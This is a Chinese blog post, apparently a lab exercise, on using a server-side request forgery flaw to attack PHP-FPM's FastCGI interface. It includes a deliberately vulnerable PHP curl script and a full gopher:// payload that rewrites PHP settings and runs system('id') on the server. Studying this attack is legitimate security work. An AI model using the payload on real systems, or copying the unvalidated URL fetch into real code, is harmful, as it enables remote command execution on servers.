ssrf攻击fastcgi

最新推荐文章于 2024-08-26 20:49:22 发布
最新推荐文章于 2024-08-26 20:49:22 发布
阅读量213 收藏 2
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63706130/article/details/141535125
版权

环境搭建:

进入/usr/local/nginx/html,创建一个php文件

phpinfo.php
1.php
<?php
highlight_file(__FILE__);
$url = $_GET['url'];
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, 0);
$responseText = curl_exec($curl);
echo $responseText;
curl_close($curl);
?>

问题描述

 SSRF攻击可以利用FastCGI接口,导致执行恶意命令或获取敏感数据。如果一个应用存在SSRF漏洞,并且服务器暴露了FastCGI接口,可以通过伪造请求与FastCGI服务直接交互

攻击步骤:

  • 发现SSRF漏洞:找到允许控制HTTP请求目标的漏洞
  • 定位FastCGI接口:通过SSRF请求FastCGI服务
  • 执行恶意操作:利用FastCGI请求执行命令或获取数据

查看响应包,发现端口为9000

进行攻击

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27id%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

用数据包伪造一个post请求,如auto_prepend_file参数,通过system(id)z执行,获取id。

 

·KABUTO·
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF漏洞之FastCGI利用篇
weixin_39664643的博客
03-18 2143
SSRF漏洞之FastCGI利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击FastCGI 0x00.PHP-FPM FastCGI 未授权利用 首先我们使用Vulhub漏洞靶场快速搭建漏洞环境进行复现,感受一波漏洞的危害 # 保证实验vps具有git、docker、pip、docker-compose、python基
SSRF攻击姿势汇总
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 1334
前言 这是很早就整理的笔记,今天想起来发到博客上,还是要保持写文章总结的习惯啊。 最近笔者在看讲SSRF、protocol smuggle、HTTP request smuggle、SSO任意跳转,Url解析不一致导致的安全问题。一方面由衷地佩服演讲人的脑洞和安全功底,另外一方面又在笔者又在反思,如果是我,我会怎么去发现此类漏洞,解决方案又是什么。本文不同于各大公众号千篇一律的复现、验证漏洞文章,会加入自己的思考和心得。鉴于文章会存在一些敏感内容,笔者会本着在删除敏感内容的前提下,尽量让大家都能看懂的标准
SSRF之攻击FastCGI
weixin_50464560的博客
07-03 1031
前言 上篇文章在讲利用SSRF漏洞攻击内网的Redis的时候提到了Gopher协议,说到了这个协议作为SSRF漏洞利用中的万金油,可以用它来攻击内网的FTP、Telnet、Redis、Memcache、FastCGI等应用,那么这篇文章就来介绍一下FastCGI以及利用SSRF结合Gopher协议攻击FastCGI FastCGI 维基百科的解释:快速通用网关接口(Fast Common Gateway Interface/FastCGI)是一种让交互程序与Web服务器通信的协议。FastCGI是早期通用网
ssrf攻击fastcgi复现
ningwangh的博客
08-24 210
也就是fpf的未授权访问,进行二次编码,然后进行测试。
ctfhub利用SSRF攻击内网FastCGI协议
qq_64201116的博客
06-23 2348
SSRF初步理解与探究
SSRF 攻击PHP-FPM(FastCGI 攻击):学习总结仅供参考
L2329794714的博客
03-05 1811
一、FastCGI 快速通用网关协议,fastcgi 和cgi 解决的问题一样,都是在解决http服务器(Apache、Nginx、IIS等)和其他应用程序(为客户端处理数据的程序 比如:学校官网程序)之间通信问题,区别在与处理方式的不同而有。 CGI 方式在每次http服务器收到一个http数据之后就行创建一个CGI进程,当数据处理完后立即销毁 ...
SSRF--gopher协议打FastCGI
unexpectedthing的博客
11-30 6092
FastCGI 定义: 什么是CGI CGI全称"通用网关接口"(Common Gateway Interface),用于HTTP服务器与其它机器上的程序服务通信交流的一种工具,CGI程序须运行在网络服务器上。 传统CGI接口方式的主要缺点是性能较差,因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析,然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的,因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。 什么是FastCGI FastCGI是一个可伸缩地、高速地
CTFHub-FastCGI协议及其ssrf漏洞
XYH_233的博客
02-04 692
FastCGI协议和HTTP协议一样是通信协议
ctfhub靶场练习——SSRF攻击
p36273的博客
07-01 570
靶场地址在:https://www.ctfhub.com/#/user/login使用工具:Burp Suite Professional抓包工具。
SSRF bible. Cheatsheet
08-06
SSRF是一种网络攻击技术,攻击者可以利用它诱使服务器向攻击者指定的内部或外部地址发送请求。这可以通过各种服务和应用程序组件上的漏洞来实现,允许攻击者读取或传输信息,通常用于横向移动或信息收集。 内容涵盖...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。本文将详细介绍WebLogic SSRF的工作原理、攻击案例以及CVE-...
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
第一节 SSRF原理介绍-01
09-15
SSRF漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意的url来访问内网资源,获取敏感信息或攻击内网系统。因此,服务端应该对内网目标地址进行严格的限制和过滤,并对用户输入进行严格的验证和过滤,以防御SSRF...
Android 模拟器的简单操作
最新发布
浪客川
08-26 46
打开最近使用的程序,模拟设备的。返回到主页,模拟按下设备的。返回上一层,模拟按下设备的。
dynamic-datasource-spring-boot-starter多数据源配置
wyazyf
08-22 183
这种多数据源的配置方式可以不用区分包和扫描路径。放在同一路径下即可。默认在主数据库中加载。调用其他数据源的时候,只需要在mapper.java文件上配置@DS(“mainData”)即可。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1055
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
Android笔试面试题AI答之Kotlin(20)
学无止境,止于至善
08-21 816
Elvis操作符(?:)是Kotlin(以及一些其他编程语言)中用于处理可空表达式的一种简洁方式。它允许在表达式的值为null时提供一个默认值,从而简化了空值的处理。在Kotlin中,构造函数(Constructor)是类的一个特殊方法,它用于初始化新创建的对象。与Java不同,Kotlin中的构造函数不是通过名称来定义的,而是与类名相同,并且没有返回类型(即使是void)。Kotlin支持主构造函数和次构造函数(也称为辅助构造函数或二级构造函数)。
如何防范ssrf攻击
05-08
SSRF(Server Side Request Forgery)攻击指的是攻击者通过伪造服务器端的请求,来访问该服务器无法直接访问的资源。为了防范SSRF攻击,可以采取以下措施: 1. 验证用户输入的URL合法性,过滤掉非法URL。例如,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值